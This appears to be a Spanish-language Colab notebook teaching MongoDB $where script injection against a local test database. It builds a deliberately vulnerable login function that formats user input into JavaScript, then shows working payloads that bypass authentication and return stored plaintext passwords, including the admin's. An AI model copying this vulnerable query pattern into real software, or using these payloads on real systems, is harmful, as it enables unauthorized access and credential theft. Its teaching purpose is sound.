<a href="https://colab.research.google.com/github/nrrf/ExampleInjection/blob/main/mongo_injection.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Simple Script Injection in Mongo

In [ ]:
!pip install pymongo

Looking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 492.1/492.1 kB 15.0 MB/s eta 0:00:00
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 283.7/283.7 kB 28.9 MB/s eta 0:00:00


In [ ]:
# install and start server
!apt install mongodb >log
!service mongodb start

from pymongo import MongoClient
client = MongoClient()
client.list_database_names() # ['admin', 'local']



 * Starting database mongodb
   ...done.


['admin', 'config', 'local']

Ahora tenemos un Script 

In [ ]:
data = [
  {
    "_id":1,
    "username":"admin1",
    "password":"admin1!",
    "name":"Admin",
    "surname":"User"
  },
  {
    "_id":2,
    "username":"user1",
    "password":"user1!",
    "name":"Test",
    "surname":"User"
  },
  {
    "_id":3,
    "username":"user2",
    "password":"user2!",
    "name":"Test2",
    "surname":"User"
  }
]

In [ ]:
miDb = client.injection
miCol = miDb.user
x = miCol.insert_many(data)

In [ ]:
client.list_database_names()

['admin', 'config', 'injection', 'local']

In [ ]:
miDoc = miCol.find_one({"_id":2})
print(miDoc)

{'_id': 2, 'username': 'user1', 'password': 'user1!', 'name': 'Test', 'surname': 'User'}


In [ ]:
miDoc = miCol.find_one({ "username": "user1", "password": "user1!" }) 
miDoc

{'_id': 2,
 'username': 'user1',
 'password': 'user1!',
 'name': 'Test',
 'surname': 'User'}

In [ ]:
miDoc = miCol.find_one({
    "$where": """function() { return this.username == \"%s\" && this.password == \"%s\"}""" % (username, password)}) 
miDoc

{'_id': 1,
 'username': 'admin1',
 'password': 'admin1!',
 'name': 'Admin',
 'surname': 'User'}

In [ ]:
def user_authentication(username,password):
  FIND_USER_BY_USERNAME_PASSWORD = "{$where: 'function() { return this.username == \"%s\" && this.password == \"%s\"}'}" 
  query = """function() { return this.username == \"%s\" && this.password == \"%s\"}""" % (username, password) 
  print(query)
  #user_in_db = miCol.find_one({ "username": username, "password": password })  
  user_in_db = miCol.find_one({
    "$where": query}) 
  if user_in_db == None:
    raise Exception("status_code=404, detail=Autenticacion fallida")
  return {"Autenticado": True, "credenciales de usuario": user_in_db}

# Pruebas generales  

Vamos a probar el request de autenticacion comunes, sin script injection

## Usuario correcto - Password incorrecto

In [ ]:
#@title Click `Show code` in the code cell. { display-mode: "form" }

username = 'user1' #@param {type: "string"}
password = 'adm' #@param {type: "string"}

In [ ]:
user_authentication(username,password)

function() { return this.username == "user1" && this.password == "adm"}


Exception: ignored

## Usuario incorrecto, password existente

In [ ]:
#@title Click `Show code` in the code cell. { display-mode: "form" }

username = 'sasa' #@param {type: "string"}
password = 'user1!' #@param {type: "string"}

In [ ]:
user_authentication(username,password)

function() { return this.username == "sasa" && this.password == "user1!"}


Exception: ignored

## Autenticacion Correcta

In [ ]:
#@title Click `Show code` in the code cell. { display-mode: "form" }

username = 'user1' #@param {type: "string"}
password = 'user1!' #@param {type: "string"}

In [ ]:
user_authentication(username,password)

function() { return this.username == "user1" && this.password == "user1!"}


{'Autenticado': True,
 'credenciales de usuario': {'_id': 2,
  'username': 'user1',
  'password': 'user1!',
  'name': 'Test',
  'surname': 'User'}}

# Prueba de Script Injection 

Ahora vamos a usar unos pequeños trucos de script injection para evadir la autenticacion al sitio tomando ya sea un usuario especifico o el primero que se encuentre en la base de datos

In [ ]:
username = 'user1" || "1"=="1'
password = "asc"

In [ ]:
user_authentication(username,password)

function() { return this.username == "user1" || "1"=="1" && this.password == "asc"}


{'Autenticado': True,
 'credenciales de usuario': {'_id': 2,
  'username': 'user1',
  'password': 'user1!',
  'name': 'Test',
  'surname': 'User'}}

Vemos que se hace un script injection y se hace una condicion que siempre es True ya que "1"=="1" siempre se cumple

Ahora vamos a hacer otro script injection, pero esta vez vamos a hacer el injection en el campo de password

In [ ]:
username = 'user1'
password = 'abc"|| "1"=="1'

In [ ]:
user_authentication(username,password)

function() { return this.username == "user1" && this.password == "abc"|| "1"=="1"}


{'Autenticado': True,
 'credenciales de usuario': {'_id': 1,
  'username': 'admin1',
  'password': 'admin1!',
  'name': 'Admin',
  'surname': 'User'}}

Ahora vamos a hacer login de un usuario sin siquiera poniendo cualquier nombre de usuario (no necesita estar registrado en la base de datos )



In [ ]:
username = 'abc" /* '
password = 'abc */||"1"=="1'

In [ ]:
user_authentication(username,password)

function() { return this.username == "abc" /* " && this.password == "abc */||"1"=="1"}


{'Autenticado': True,
 'credenciales de usuario': {'_id': 1,
  'username': 'admin1',
  'password': 'admin1!',
  'name': 'Admin',
  'surname': 'User'}}

# Bibliografia  

- https://colab.research.google.com/drive/1uDo5AOCESYN-3AwHx22ylc3M5B9Cli4m?usp=sharing

- https://www.google.com/search?q=run+flask+app+with+colab&rlz=1C1GCEU_esCO1044CO1044&oq=run+flask+app+with+colab+&aqs=chrome..69i57j0i22i30.16937j0j4&sourceid=chrome&ie=UTF-8